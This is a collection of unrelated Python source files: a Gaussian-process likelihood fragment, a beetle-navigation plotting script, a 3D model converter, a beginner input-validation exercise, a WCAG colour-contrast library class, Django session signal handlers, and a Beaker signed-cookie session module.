grad_v[np.isnan(grad_v)] = 0.0
ll = min(ll, -1e100)
except FloatingPointError as e:
print "warning: floating point error (%s) in likelihood computation, returning likelihood -inf" % str(e)
ll = np.float("-inf")
grad_v = np.zeros((len(v),))
except np.linalg.linalg.LinAlgError as e:
print "warning: lin alg error (%s) in likelihood computation, returning likelihood -inf" % str(e)
ll = np.float("-inf")
grad_v = np.zeros((len(v),))
except scikits.sparse.cholmod.CholmodError as e:
print "warning: cholmod error (%s) in likelihood computation, returning likelihood -inf" % str(e)
ll = np.float("-inf")
grad_v = np.zeros((len(v),))
#except ValueError as e:
# print "warning: value error (%s) in likelihood computation, returning likelihood -inf" % str(e)
# ll = np.float("-inf")
# grad = np.zeros((len(v),))
#print "hyperparams", v, "ll", ll, 'grad', grad
return -1 * ll, (-1 * grad_v if grad_v is not None else None)
def build_gp(v, **kwargs2):
expv = np.exp(v)
if force_unit_var:
expv = expand_reduced_params(expv)
cluster_covs, cluster_noise_vars = covs_from_vector(expv)
kw = dict(kwargs.items() + kwargs2.items())
gps = []
for (y, yvars) in zip(y_list, yvars_list):
gp = LocalGPEnsemble(cluster_centers=cluster_centers,
cluster_noise_vars=cluster_noise_vars,
cluster_covs=cluster_covs,
y=y, yvars=yvars, **kw)
gps.append(gp)
if len(gps) == 1:
return gp
else:
return gps
noise_var_default = noise_prior.predict()
if force_unit_var:
x0 = np.concatenate([[0.4, 0.6,] + list(cov_main.flatten())[1:] for i in range(n_clusters)])
x0 = reduce_params(x0)
else:
x0 = np.concatenate([[noise_var_default,] + list(cov_main.flatten()) for i in range(n_clusters)])
x0 = np.log(x0)
return nllgrad, x0, build_gp, covs_from_vector
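# Illustrative sketch (not called anywhere in this module) of how the triple
# returned by optimize_localgp_hyperparams might be fed to a gradient-based
# optimizer. Assumes scipy is available; the helper name is hypothetical.
def _example_fit_hyperparams(nllgrad, x0, build_gp):
    from scipy.optimize import minimize
    # nllgrad returns (negative log likelihood, gradient), so jac=True lets
    # the optimizer reuse the gradient computed alongside the objective.
    result = minimize(nllgrad, x0, jac=True, method="L-BFGS-B")
    # build_gp reconstructs LocalGPEnsemble objects from the optimized
    # (log-space) hyperparameter vector.
    return build_gp(result.x)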
|
"""
General usage script
-
Expected usage: the user defines a configuration file and then runs this script on it. This is
typically done through the Jupyter notebook.
"""
# Pathfinder imports
from pathfinder.world.dome import Dome
from pathfinder.world.devtools import DevAxes, DevCompassMarkings
from pathfinder.world.beetle import Beetle
from pathfinder.util.legends import *
from pathfinder.util.deserialiser import Deserialiser
import pathfinder.configuration as conf
import pathfinder.definitions as defn
# Python library imports
from mpl_toolkits.mplot3d import Axes3D # This seems to be required, though PyCharm disagrees
import matplotlib.pyplot as plt
import numpy as np
import os
def main(config_file=""):
# If a config file is specified, use it in place of the default.
if config_file != "":
defn.CONFIG_FILE = os.path.join(defn.CONFIG_DIR, config_file)
# DEBUG #
#print("Project root directory: " + defn.ROOT_DIR)
#print("Using configuration file: " + defn.CONFIG_FILE)
deserialiser = Deserialiser(configuration_path=defn.CONFIG_FILE)
deserialiser.init_configuration()
devcompass = DevCompassMarkings()
dome = Dome()
beetle = Beetle()
entity_list = [dome, devcompass]
# Get roll configuration from conf module
cue_list_roll_one = conf.cues_roll_one
cue_list_roll_two = conf.cues_roll_two
plt.close('all')
fig = plt.figure()
# 3D world axes
first_roll_world_ax = fig.add_subplot(221, projection='3d')
second_roll_world_ax = fig.add_subplot(222, projection='3d')
# Polar axes
first_roll_polar_ax = fig.add_subplot(223, projection='polar')
second_roll_polar_ax = fig.add_subplot(224, projection='polar')
# Add world entities to both axes
for x in entity_list:
x.add_to_world(first_roll_world_ax)
x.add_to_world(second_roll_world_ax)
for x in cue_list_roll_one:
x.add_to_world(first_roll_world_ax)
for x in cue_list_roll_two:
x.add_to_world(second_roll_world_ax)
# Get the beetle's behaviour
beetle.compute_first_path(cue_list_roll_one)
beetle.compute_second_path(cue_list_roll_two)
beetle.add_to_world(first_roll_world_ax)
beetle.add_to_world(second_roll_world_ax, draw_bearing_change=True)
beetle.add_to_polar(first_roll_polar_ax)
beetle.add_to_polar(second_roll_polar_ax, draw_bearing_change=True)
# DEBUG #
# print(beetle.get_result_string())
# Plot the 3D world for the first roll
first_roll_world_ax.set_title("Roll 1: 3D World")
first_roll_world_ax.view_init(elev=40, azim=-130)
first_roll_world_ax.set_axis_off()
# Plot the 3D world for the second roll
second_roll_world_ax.set_title("Roll 2: 3D World")
second_roll_world_ax.view_init(elev=40, azim=-130)
second_roll_world_ax.set_axis_off()
# Polar plot configuration
first_roll_polar_ax.set_rticks([])
first_roll_polar_ax.set_rmin(0)
first_roll_polar_ax.set_rmax(1)
first_roll_polar_ax.set_thetalim(-np.pi, np.pi)
first_roll_polar_ax.set_xticks(np.linspace(np.pi, -np.pi, 4, endpoint=False))
first_roll_polar_ax.grid(False)
first_roll_polar_ax.set_theta_direction(-1)
first_roll_polar_ax.set_theta_zero_location("N")
first_roll_polar_ax.set_title("Roll 1: path and cue vector")
second_roll_polar_ax.set_rticks([])
second_roll_polar_ax.set_rmin(0)
second_roll_polar_ax.set_rmax(1)
second_roll_polar_ax.set_thetalim(-np.pi, np.pi)
second_roll_polar_ax.set_xticks(np.linspace(np.pi, -np.pi, 4, endpoint=False))
second_roll_polar_ax.grid(False)
second_roll_polar_ax.set_theta_direction(-1)
second_roll_polar_ax.set_theta_zero_location("N")
second_roll_polar_ax.set_title("Roll 2: path and cue vector")
if conf.display_legend:
# Add legends if they're enabled.
second_roll_world_ax.legend(handles=create_world_legend_handles(), bbox_to_anchor=(1.05, 1))
second_roll_polar_ax.legend(handles=create_polar_legend_handles(), bbox_to_anchor=(1.6, 0.2))
plt.show()
# Print terminal output: this was modified to make the output more readable. Debug statements are still
# available as comments.
print("Project root directory: " + defn.ROOT_DIR)
print("Using configuration file: " + defn.CONFIG_FILE)
conf.print_configuration()
print(beetle.get_result_string())
def wind_and_light_main(cue_info_dictionary):
"""
Dedicated main for the simplified wind and light case for immediate experiments.
This will create a configuration file from information provided externally (through a jupyter
notebook) and then run the software using that configuration.
:param cue_info_dictionary: Dictionary defining the configuration
:return: Unused
"""
from pathfinder.util.serialiser import Serialiser
filename = "jupyter_auto_conf.yaml"
Serialiser.write_configuration_dictionary_to_file(cue_info_dictionary, filename)
main(filename)
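# Example call (illustrative only; the dictionary keys expected by the
# Serialiser are defined elsewhere, not in this file):
#   wind_and_light_main(cue_info_dictionary={...})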
if __name__ == '__main__':
# Note to developer: set the input file back to config.yaml after development; I've noticed a habit of
# leaving it as untracked_config which is, well, untracked, so people cloning the repo won't have it!
# TODO: It would be good if this could be set dynamically without needing to change names each time.
# TODO: An easy way to do this might be to use environment variables or similar.
main("config.yaml")
|
import json
import os
import numpy as np
#user adjustable variables
#file
filepath = "D:\SourceCode\Python\Mine imator\Blendbench\converted\OuterTaleGasterBlaster_convert.mimodel"
newFilepath = "D:\SourceCode\Python\Mine imator\Blendbench\converted"
#setting
offset = False
a = 1.05
decimals = 0 # number of decimal places kept after rescaling
multiplier = 3.75
UVmultiplier = 20
# file variables
filetype = [".json",".mimodel"]
file = os.path.split(filepath)
#default
defaultTexture = "Default texture" # default Inherit texture. Relative file path?
defaultTextureSize = [16,16] # default based on Inherit texture # What does the "texture_size" even do? I don't even know
debug = False
def recalc(value):
newValue = np.round(np.multiply(value, multiplier), decimals)
return newValue
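# e.g. with multiplier 3.75 and decimals 0, a Mine-imator length of 16
# maps to round(16 * 3.75) = 60 Blockbench units (illustrative).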
def worldGrid(offset): # offset worldGrid by (8,0,8) because Blockbench does not expect the world origin at the corner of the grid
pivotOffset = np.array([0, 0, 0])
if offset:
pivotOffset = np.multiply([8, 0, 8], multiplier)
return pivotOffset
def load(filepath): # Load mimodel and Minecraft json
try:
with open(filepath, "r") as fileObject:
data = json.load(fileObject)
textureIndex = 0
try: # Exception No "textures" found
try:
texture = data["textures"][str(textureIndex)]
except IndexError:
textureIndex+=1
texture = data["textures"][str(textureIndex)]
except KeyError:
texture = defaultTexture
try: # Exception No "textures_size" found
texture_size=data["texture_size"]
except KeyError:
texture_size= defaultTextureSize
elements = data["elements"] # Extract "elements"
return elements, texture, texture_size
except FileNotFoundError:
print('File not found. Please recheck the file or directory and make sure the path is correct.')
def convertBlock(filepath,offset):
elements, texture, texture_size = load(filepath)
model = file[1].replace(filetype[0],'')
pivotOffset = worldGrid(offset)
elementList =[]
bbmodel_json = {
"name": model + " converted by Blendbench - zNight Animatics",
"texture_size": texture_size,
"textures": {"0":texture},
"elements": [],
# "groups" : groups
}
for i,element in enumerate(elements):
elementData = element
elementName = elementData["name"]
elementFrom = recalc(elementData["from"] - pivotOffset)
elementTo = recalc(elementData["to"] - pivotOffset)
elementRotate = elementData["rotation"]
elementAngle = elementRotate["angle"]
elementAxis = elementRotate["axis"]
elementOrigin = recalc(elementRotate["origin"] - pivotOffset)
elementOrigin = elementOrigin.tolist()
elementFace = elementData["faces"]
elementRotate = {}
elementRotate["angle"] = elementAngle
elementRotate["axis"] = elementAxis
elementRotate["origin"] = elementOrigin
elementFrom = elementFrom.tolist()
elementTo = elementTo.tolist()
elementList.append({
"name": elementName,
"from": elementFrom,
"to" : elementTo,
"rotation": elementRotate,
"faces": elementFace
})
bbmodel_json["elements"] = elementList
return bbmodel_json
def exportBB(filepath,newFilepath,offset):
path = os.path.split(filepath)[0]
file = os.path.split(filepath)[1].replace(filetype[0],'')
bbmodel_json = convertBlock(filepath,offset)
if path == newFilepath:
file = file+"_converted"+filetype[0]
else:
file = file+filetype[0]
newFilepath = newFilepath+"\\"+file
with open(newFilepath, "w") as f:
json.dump(bbmodel_json, f)
def convert(filepath,newFilepath,offset):
exportBB(filepath,newFilepath,offset)
if __name__ == "__main__":
# clear screen
os.system('cls')
convert(filepath,newFilepath,offset)
|
# Desafio 104 (Challenge 104): Create a program with a function leiaInt(), which works
# much like Python's input() function, except that it validates the input
# and accepts only a numeric value.
from rotinas import var, titulo, err
def leiaInt(texto):
while True:
n = input(texto)
if n.isnumeric():
return int(n)
print(f'{err("Erro: Digite um número inteiro.")}')
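# Example interaction (illustrative): typing 'abc' re-prompts with the error
# message above; typing '42' returns the int 42.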
titulo('Lendo dados', 40)
numero = leiaInt('Digite um número: ')
print(f'Você digitou {var(numero)} que é um número inteiro.')
|
'''Provide Color class that represents specific colors
This module also provides lists of predefined colors represented as
instances of Color class.
'''
from os import path
import json
from itertools import product
from . import utils
from . import checker
from .threshold_finders import brightness as brightness_finder
from .threshold_finders import lightness as lightness_finder
from .converters import brightness as brightness_conv
from .converters import contrast as contrast_conv
from .converters import grayscale as grayscale_conv
from .converters import hue_rotate as hue_rotate_conv
from .converters import invert as invert_conv
from .converters import saturate as saturate_conv
class Color:
@classmethod
def from_name(cls, name):
"""Return an instance of Color for a predefined color name.
Color names are defined at
https://www.w3.org/TR/SVG/types.html#ColorKeywords
:param name: Name of color
:type name: str
:return: Instance of Color
:rtype: Color
"""
normalized_name = name.lower()
if not normalized_name in NAME_TO_COLOR:
return None
return NAME_TO_COLOR[normalized_name]
@classmethod
def from_rgb(cls, rgb, name=None):
"""Return an instance of Color for a hex color code.
:param rgb: RGB value represented as a tuple of integers such
such as (255, 255, 0)
:type rgb: (int, int, int)
:param name: You can name the color to be created [optional]
:type name: str
:return: an instance of Color
:rtype: Color
"""
hex_code = utils.rgb_to_hex(rgb)
if not name and hex_code in HEX_TO_COLOR:
return HEX_TO_COLOR[hex_code]
return Color(rgb, name)
@classmethod
def from_hex(cls, hex_code, name=None):
"""Return an instance of Color for a hex color code.
:param hex_code: Hex color code such as "#ffff00"
:type hex_code: str
:param name: You can name the color to be created [optional]
:type name: str
:return: an instance of Color
:rtype: Color
"""
normalized_hex = utils.normalize_hex(hex_code)
if not name and normalized_hex in HEX_TO_COLOR:
return HEX_TO_COLOR[normalized_hex]
return Color(normalized_hex, name)
@classmethod
def from_hsl(cls, hsl, name=None):
"""Create an instance of Color from an HSL value.
:param hsl: HSL value represented as a tuple of numbers
:type hsl: (float, float, float)
:param name: You can name the color to be created [optional]
:type name: str
:return: an instance of Color
:rtype: Color
"""
hex_code = utils.hsl_to_hex(hsl)
if not name and hex_code in HEX_TO_COLOR:
return HEX_TO_COLOR[hex_code]
return cls(hex_code, name)
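# e.g. Color.from_hsl((60, 100, 50)) is pure yellow, "#ffff00" (illustrative).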
def __init__(self, rgb, name=None):
"""Create an instance of Color.
:param rgb: RGB value represented as a tuple of integers or
hex color code such as "#ffff00"
:type rgb: str or (int, int, int)
:param name: You can name the color to be created.
Without this option, a color keyword name (if
exists) or the value of normalized hex color code
is assigned instead. [optional]
:type name: str
:return: an instance of Color
:rtype: Color
"""
if isinstance(rgb, str):
self.rgb = utils.hex_to_rgb(rgb)
else:
self.rgb = rgb
self.hex = utils.rgb_to_hex(self.rgb)
self.name = name or self.common_name
self.relative_luminance = checker.relative_luminance(self.rgb)
self.__hsl = None
self.__rgb_code = None
def __str__(self):
return self.hex
@property
def hsl(self):
"""Return HSL value of the color.
The value is calculated from the RGB value, so if you create
the instance by Color.from_hsl method, the value used to
create the color does not necessarily correspond to the value
of this property.
:return: HSL value represented as a tuple of numbers
:rtype: (float, float, float)
"""
if self.__hsl is None:
self.__hsl = utils.rgb_to_hsl(self.rgb)
return self.__hsl
@property
def rgb_code(self):
"""Return a string representation of RGB value.
:return: For example if the color is yellow, the return value
is "rgb(255,255,0)".
:rtype: str
"""
if self.__rgb_code is None:
self.__rgb_code = 'rgb({:d},{:d},{:d})'.format(*self.rgb)
return self.__rgb_code
@property
def common_name(self):
"""Return a color keyword name or a hex color code.
A name defined at https://www.w3.org/TR/SVG/types.html will be
returned when the name corresponds to the hex color code of
the color. Otherwise the hex color code will be returned.
:return: Color keyword name or hex color code
:rtype: str
"""
if self.hex in HEX_TO_COLOR:
return HEX_TO_COLOR[self.hex].name
return self.hex
def contrast_ratio_against(self, other_color):
"""Calculate the contrast ratio against another color.
:param other_color: Another instance of Color, RGB value or
hex color code
:type other_color: Color or (int, int, int) or str
:return: Contrast ratio
:rtype: float
"""
if not isinstance(other_color, Color):
return checker.contrast_ratio(self.rgb, other_color)
other_luminance = other_color.relative_luminance
return checker.luminance_to_contrast_ratio(self.relative_luminance,
other_luminance)
def contrast_level(self, other_color):
"""Return the level of contrast ratio defined by WCAG 2.0.
:param other_color: Another instance of Color, RGB value or
hex color code
:type other_color: Color or (int, int, int) or str
:return: "A", "AA" or "AAA" if the contrast ratio meets the
criteria of WCAG 2.0, otherwise "-"
:rtype: str
"""
ratio = self.contrast_ratio_against(other_color)
return checker.ratio_to_level(ratio)
def has_sufficient_contrast(self, other_color,
level=checker.WCAGLevel.AA):
"""Check if the contrast ratio with another color meets a
WCAG 2.0 criterion.
:param other_color: Another instance of Color, RGB value or
hex color code
:type other_color: Color or (int, int, int) or str
:param level: "A", "AA" or "AAA" [optional]
:type level: str
:return: True if the contrast ratio meets the specified level
:rtype: bool
"""
ratio = checker.level_to_ratio(level)
return self.contrast_ratio_against(other_color) >= ratio
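# Examples (illustrative, using the predefined color keywords):
#   yellow = Color.from_name('yellow'); white = Color.from_name('white')
#   yellow.contrast_ratio_against(white)                      # ~1.07, fails "AA"
#   yellow.contrast_ratio_against(Color.from_name('black'))   # ~19.56 -> level "AAA"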
def is_same_color(self, other_color):
"""Check it two colors have the same RGB value.
:param other_color: Another instance of Color, RGB value or
hex color code
:type other_color: Color or (int, int, int) or str
:return: True if other_color has the same RGB value
:rtype: bool
"""
if isinstance(other_color, Color):
return self.hex == other_color.hex
if isinstance(other_color, tuple):
return self.hex == utils.rgb_to_hex(other_color)
if isinstance(other_color, str):
return self.hex == utils.normalize_hex(other_color)
return False
def has_max_contrast(self):
"""Check if the color reachs already the max contrast..
The max contrast in this context means that of colors modified
by the operation defined at
https://www.w3.org/TR/filter-effects/#funcdef-contrast
:return: True if self.with_contrast(r) where r is greater
than 100 returns the same color as self.
:rtype: bool
"""
return all(c in (0, 255) for c in self.rgb)
def has_min_contrast(self):
"""Check if the color reachs already the min contrast.
The min contrast in this context means that of colors modified
by the operation defined at
https://www.w3.org/TR/filter-effects/#funcdef-contrast
:return: True if self is the same color as "#808080"
:rtype: bool
"""
return self.rgb == self.GRAY.rgb
def has_higher_luminance(self, other_color):
"""Check if the color has higher luminance than another color.
:param other_color: Another color
:type other_color: Color
:return: True if the relative luminance of self is higher than
that of other_color
:rtype: bool
"""
return self.relative_luminance > other_color.relative_luminance
def has_same_luminance(self, other_color):
"""Check if two colors has the same relative luminance.
:param other_color: Another color
:type other_color: Color
:return: True if the relative luminance of self and other_color
are the same.
:rtype: bool
"""
return self.relative_luminance == other_color.relative_luminance
def is_light_color(self):
"""Check if the contrast ratio against black is higher than
against white.
:return: True if the contrast ratio against white is equal to or
less than the ratio against black
:rtype: bool
"""
contrast_ratio_against_white = self.contrast_ratio_against(self.WHITE)
contrast_ratio_against_black = self.contrast_ratio_against(self.BLACK)
return contrast_ratio_against_white <= contrast_ratio_against_black
def with_contrast(self, ratio, name=None):
"""Return a new instance of Color with adjusted contrast.
:param ratio: Adjustment ratio in percentage
:type ratio: float
:param name: You can name the color to be created.
Without this option, the value of normalized hex
color code is assigned instead. [optional]
:type name: str
:return: New color with adjusted contrast
:rtype: Color
"""
return self.__generate_new_color(contrast_conv, ratio, name)
def with_brightness(self, ratio, name=None):
"""Return a new instance of Color with adjusted brightness.
:param ratio: Adjustment ratio in percentage
:type ratio: float
:param name: You can name the color to be created.
Without this option, the value of normalized hex
color code is assigned instead. [optional]
:type name: str
:return: New color with adjusted brightness
:rtype: Color
"""
return self.__generate_new_color(brightness_conv, ratio, name)
def with_invert(self, ratio=100, name=None):
"""Return an inverted color as an instance of Color.
:param ratio: Proportion of the conversion in percentage
:type ratio: float
:param name: You can name the color to be created.
Without this option, the value of normalized hex
color code is assigned instead. [optional]
:type name: str
:return: New inverted color
:rtype: Color
"""
return self.__generate_new_color(invert_conv, ratio, name)
def with_hue_rotate(self, degree, name=None):
"""Return a hue rotation applied color as an instance of Color.
:param degree: Degrees of rotation (0 to 360)
:type degree: float
:param name: You can name the color to be created.
Without this option, the value of normalized hex
color code is assigned instead. [optional]
:type name: str
:return: New hue rotation applied color
:rtype: Color
"""
return self.__generate_new_color(hue_rotate_conv, degree, name)
def with_saturate(self, ratio, name=None):
"""Return a saturated color as an instance of Color.
:param ratio: Proportion of the conversion in percentage
:type ratio: float
:param name: You can name the color to be created.
Without this option, the value of normalized hex
color code is assigned instead. [optional]
:type name: str
:return: New saturated color
:rtype: Color
"""
return self.__generate_new_color(saturate_conv, ratio, name)
def with_grayscale(self, ratio=100, name=None):
"""Return a grayscale of the original color.
:param ratio: Conversion ratio in percentage
:type ratio: float
:param name: You can name the color to be created.
Without this option, the value of normalized hex
color code is assigned instead. [optional]
:type name: str
:return: New grayscale color
:rtype: Color
"""
return self.__generate_new_color(grayscale_conv, ratio, name)
def __generate_new_color(self, calc, ratio, name=None):
new_rgb = calc.calc_rgb(self.rgb, ratio)
return self.__class__(new_rgb, name)
def find_brightness_threshold(self, other_color,
level=checker.WCAGLevel.AA):
"""Try to find a color who has a satisfying contrast ratio.
The returned color is gained by modifying the brightness of
another color. Even when a color that satisfies the specified
level is not found, it returns a new color anyway.
:param other_color: Color before the adjustment of brightness
:type other_color: Color or (int, int, int) or str
:param level: "A", "AA" or "AAA" [optional]
:type level: str
:return: New color whose brightness is adjusted from that of
other_color
:rtype: Color
"""
if not isinstance(other_color, Color):
other_color = Color(other_color)
return Color(brightness_finder.find(self.rgb, other_color.rgb, level))
def find_lightness_threshold(self, other_color,
level=checker.WCAGLevel.AA):
"""Try to find a color who has a satisfying contrast ratio.
The returned color is gained by modifying the lightness of
another color. Even when a color that satisfies the specified
level is not found, it returns a new color anyway.
:param other_color: Color before the adjustment of lightness
:type other_color: Color or (int, int, int) or str
:param level: "A", "AA" or "AAA" [optional]
:type level: str
:return: New color whose lightness is adjusted from that of
other_color
:rtype: Color
"""
if not isinstance(other_color, Color):
other_color = Color(other_color)
return Color(lightness_finder.find(self.rgb, other_color.rgb, level))
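# Example (illustrative): to make a foreground color readable on white,
# Color.WHITE.find_brightness_threshold(fg, "AA") adjusts fg's brightness
# (typically darkening it) until the WCAG AA ratio of 4.5:1 is met where possible.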
_here = path.abspath(path.dirname(__file__))
# named colors: https://www.w3.org/TR/SVG/types.html#ColorKeywords
with open(path.join(_here, 'color_keywords.json')) as f:
_color_keywords = json.loads(f.read())
NAMED_COLORS = tuple(Color(hex, name) for name, hex in _color_keywords)
NAME_TO_COLOR = {color.name: color for color in NAMED_COLORS}
HEX_TO_COLOR = {color.hex: color for color in NAMED_COLORS}
def _generate_web_safe_colors():
colors = []
web_safe_values = [c * 17 for c in range(0, 16, 3)]
for rgb in [tuple(c) for c in sorted(product(web_safe_values, repeat=3))]:
hex_code = utils.rgb_to_hex(rgb)
if hex_code in HEX_TO_COLOR:
colors.append(HEX_TO_COLOR[hex_code])
else:
colors.append(Color(hex_code))
return tuple(colors)
WEB_SAFE_COLORS = _generate_web_safe_colors()
def hsl_colors(s=100, l=50, h_interval=1):
"""Return a list of colors which share the same saturation and
lightness.
By default, so-called pure colors are returned.
:param s: Ratio of saturation in percentage [optional]
:type s: float
:param l: Ratio of lightness in percentage [optional]
:type l: float
:param h_interval: Interval of hues in degrees. By default, it
returns 360 hues beginning from red. [optional]
:type h_interval: int
:return: List of colors
:rtype: list of Color
"""
hues = range(0, 361, h_interval)
return [Color.from_hsl((h, s, l)) for h in hues]
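# e.g. hsl_colors(h_interval=60) returns 7 colors for hues 0, 60, ..., 360;
# note that hue 0 and hue 360 are both red, so the endpoints repeat.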
Color.BLACK = Color.from_name('black')
Color.GRAY = Color.from_name('gray')
Color.WHITE = Color.from_name('white')
|
from django.contrib.auth.signals import user_logged_in, user_logged_out
from django.dispatch import receiver
@receiver(user_logged_in)
def on_login(sender, user, request, **kwargs):
user.profile.shopping_cart.clear()
@receiver(user_logged_out)
def on_logout(sender, user, request, **kwargs):
user.profile.shopping_cart.clear()
|
import cPickle
import Cookie
import hmac
import md5
import os
import random
import sha
import sys
import time
import UserDict
from datetime import datetime, timedelta
# Determine if strong crypto is available
crypto_ok = False
# Check for pycryptopp encryption for AES
try:
from pycryptopp.cipher import aes
from beaker.crypto import generateCryptoKeys
crypto_ok = True
except:
pass
from beaker.container import namespace_registry
from beaker.exceptions import BeakerException
from beaker.util import b64decode, b64encode, coerce_session_params
__all__ = ['SignedCookie', 'Session']
class SignedCookie(Cookie.BaseCookie):
"extends python cookie to give digital signature support"
def __init__(self, secret, input=None):
self.secret = secret
Cookie.BaseCookie.__init__(self, input)
def value_decode(self, val):
val = val.strip('"')
sig = hmac.new(self.secret, val[40:], sha).hexdigest()
if sig != val[:40]:
return None, val
else:
return val[40:], val
def value_encode(self, val):
sig = hmac.new(self.secret, val, sha).hexdigest()
return str(val), ("%s%s" % (sig, val))
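# On the wire the signed value is "<40-hex-char HMAC-SHA1 digest><payload>";
# value_decode() recomputes the digest over the payload and yields None for
# the decoded value when the signature does not match.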
class Session(UserDict.DictMixin):
"session object that uses container package for storage"
def __init__(self, request, id=None, invalidate_corrupt=False,
use_cookies=True, type=None, data_dir=None,
key='beaker.session.id', timeout=None, cookie_expires=True,
cookie_domain=None, secret=None, secure=False, log_file=None,
namespace_class=None, **kwargs):
if type is None:
if data_dir is None:
self.type = 'memory'
else:
self.type = 'file'
else:
self.type = type
if namespace_class is None:
self.namespace_class = namespace_registry(self.type)
else:
self.namespace_class = namespace_class
self.kwargs = kwargs
self.request = request
self.data_dir = data_dir
self.key = key
self.timeout = timeout
self.use_cookies = use_cookies
self.cookie_expires = cookie_expires
self.cookie_domain = cookie_domain
self.log_file = log_file
self.was_invalidated = False
self.secret = secret
self.secure = secure
self.id = id
if self.use_cookies:
try:
cookieheader = request['cookie']
except KeyError:
cookieheader = ''
if secret is not None:
try:
self.cookie = SignedCookie(secret, input = cookieheader)
except Cookie.CookieError:
self.cookie = SignedCookie(secret, input = None)
else:
self.cookie = Cookie.SimpleCookie(input = cookieheader)
if self.id is None and self.cookie.has_key(self.key):
self.id = self.cookie[self.key].value
if self.id is None:
self._create_id()
else:
self.is_new = False
if not self.is_new:
try:
self.load()
except:
if invalidate_corrupt:
self.invalidate()
else:
raise
else:
self.dict = {}
def _create_id(self):
if hasattr(os, 'getpid'):
pid = os.getpid()
else:
pid = ''
self.id = md5.new(
md5.new("%f%s%f%s" % (time.time(), id({}), random.random(), pid) ).hexdigest(),
).hexdigest()
self.is_new = True
if self.use_cookies:
self.cookie[self.key] = self.id
if self.cookie_domain:
self.cookie[self.key]['domain'] = self.cookie_domain
if self.secure:
self.cookie[self.key]['secure'] = True
self.cookie[self.key]['path'] = '/'
if self.cookie_expires is not True:
if self.cookie_expires is False:
expires = datetime.fromtimestamp( 0x7FFFFFFF )
elif isinstance(self.cookie_expires, timedelta):
expires = datetime.today() + self.cookie_expires
elif isinstance(self.cookie_expires, datetime):
expires = self.cookie_expires
else:
raise ValueError("Invalid argument for cookie_expires: %s"
% repr(self.cookie_expires))
self.cookie[self.key]['expires'] = \
expires.strftime("%a, %d-%b-%Y %H:%M:%S GMT" )
self.request['cookie_out'] = self.cookie[self.key].output(header='')
self.request['set_cookie'] = False
created = property(lambda self: self.dict['_creation_time'])
def delete(self):
"""deletes the persistent storage for this session, but remains valid. """
self.namespace.acquire_write_lock()
try:
self.namespace.remove()
finally:
self.namespace.release_write_lock()
def __getitem__(self, key):
return self.dict.__getitem__(key)
def __setitem__(self, key, value):
self.dict.__setitem__(key, value)
def __delitem__(self, key):
del self.dict[key]
def keys(self):
return self.dict.keys()
def __contains__(self, key):
return self.dict.has_key(key)
def has_key(self, key):
return self.dict.has_key(key)
def __iter__(self):
return iter(self.dict.keys())
def iteritems(self):
return self.dict.iteritems()
def invalidate(self):
"invalidates this session, creates a new session id, returns to the is_new state"
namespace = self.namespace
namespace.acquire_write_lock()
try:
namespace.remove()
finally:
namespace.release_write_lock()
self.was_invalidated = True
self._create_id()
self.load()
def load(self):
"loads the data from this session from persistent storage"
self.namespace = self.namespace_class(self.id, data_dir=self.data_dir,
digest_filenames=False, **self.kwargs)
namespace = self.namespace
self.request['set_cookie'] = True
namespace.acquire_write_lock()
try:
self.debug("session loading keys")
self.dict = {}
now = time.time()
if not namespace.has_key('_creation_time'):
namespace['_creation_time'] = now
self.is_new = True
try:
self.accessed = namespace['_accessed_time']
namespace['_accessed_time'] = now
except KeyError:
namespace['_accessed_time'] = self.accessed = now
if self.timeout is not None and now - self.accessed > self.timeout:
self.invalidate()
else:
for k in namespace.keys():
self.dict[k] = namespace[k]
finally:
namespace.release_write_lock()
def save(self):
"saves the data for this session to persistent storage"
if not hasattr(self, 'namespace'):
curdict = self.dict
self.load()
self.dict = curdict
self.namespace.acquire_write_lock()
try:
self.debug("session saving keys")
todel = []
for k in self.namespace.keys():
if not self.dict.has_key(k):
todel.append(k)
for k in todel:
del self.namespace[k]
for k in self.dict.keys():
self.namespace[k] = self.dict[k]
self.namespace['_accessed_time'] = self.dict['_accessed_time'] \
= time.time()
self.namespace['_creation_time'] = self.dict['_creation_time'] \
= time.time()
finally:
self.namespace.release_write_lock()
if self.is_new:
self.request['set_cookie'] = True
def lock(self):
"""locks this session against other processes/threads. this is
automatic when load/save is called.
***use with caution*** and always with a corresponding 'unlock'
inside a "finally:" block,
as a stray lock typically cannot be unlocked
without shutting down the whole application.
"""
self.namespace.acquire_write_lock()
def unlock(self):
"""unlocks this session against other processes/threads. this is
automatic when load/save is called.
***use with caution*** and always within a "finally:" block,
as a stray lock typically cannot be unlocked
without shutting down the whole application.
"""
self.namespace.release_write_lock()
def debug(self, message):
if self.log_file is not None:
self.log_file.write(message)
class CookieSession(Session):
"""Pure cookie-based session
Options recognized when using cookie-based sessions are slightly
more restricted than general sessions.
``key``
The name the cookie should be set to.
``timeout``
How long session data is considered valid. This is used
regardless of the cookie being present or not to determine
whether session data is still valid.
``encrypt_key``
The key to use for the session encryption, if not provided the session
will not be encrypted.
``validate_key``
The key used to sign the encrypted session
``cookie_domain``
Domain to use for the cookie.
``secure``
Whether or not the cookie should only be sent over SSL.
"""
def __init__(self, request, key='beaker.session.id', timeout=None,
cookie_expires=True, cookie_domain=None, encrypt_key=None,
validate_key=None, secure=False, **kwargs):
if not crypto_ok and encrypt_key:
raise BeakerException("pycryptopp is not installed, can't use "
"encrypted cookie-only Session.")
self.request = request
self.key = key
self.timeout = timeout
self.cookie_expires = cookie_expires
self.cookie_domain = cookie_domain
self.encrypt_key = encrypt_key
self.validate_key = validate_key
self.request['set_cookie'] = False
self.secure = secure
try:
cookieheader = request['cookie']
except KeyError:
cookieheader = ''
if validate_key is None:
raise BeakerException("No validate_key specified for Cookie only Session.")
try:
self.cookie = SignedCookie(validate_key, input=cookieheader)
except Cookie.CookieError:
self.cookie = SignedCookie(validate_key, input=None)
self.dict = {}
self.dict['_id'] = self._make_id()
self.is_new = True
# If we have a cookie, load it
if self.key in self.cookie and self.cookie[self.key].value is not None:
self.is_new = False
try:
self.dict = self._decrypt_data()
except:
self.dict = {}
if self.timeout is not None and time.time() - self.dict['_accessed_time'] > self.timeout:
self.dict = {}
self._create_cookie()
created = property(lambda self: self.dict['_creation_time'])
id = property(lambda self: self.dict['_id'])
def _encrypt_data(self):
"""Cerealize, encipher, and base64 the session dict"""
if self.encrypt_key:
nonce = b64encode(os.urandom(40))[:8]
encrypt_key = generateCryptoKeys(self.encrypt_key, self.validate_key + nonce, 1)
ctrcipher = aes.AES(encrypt_key)
data = cPickle.dumps(self.dict, protocol=2)
return nonce + b64encode(ctrcipher.process(data))
else:
data = cPickle.dumps(self.dict, protocol=2)
return b64encode(data)
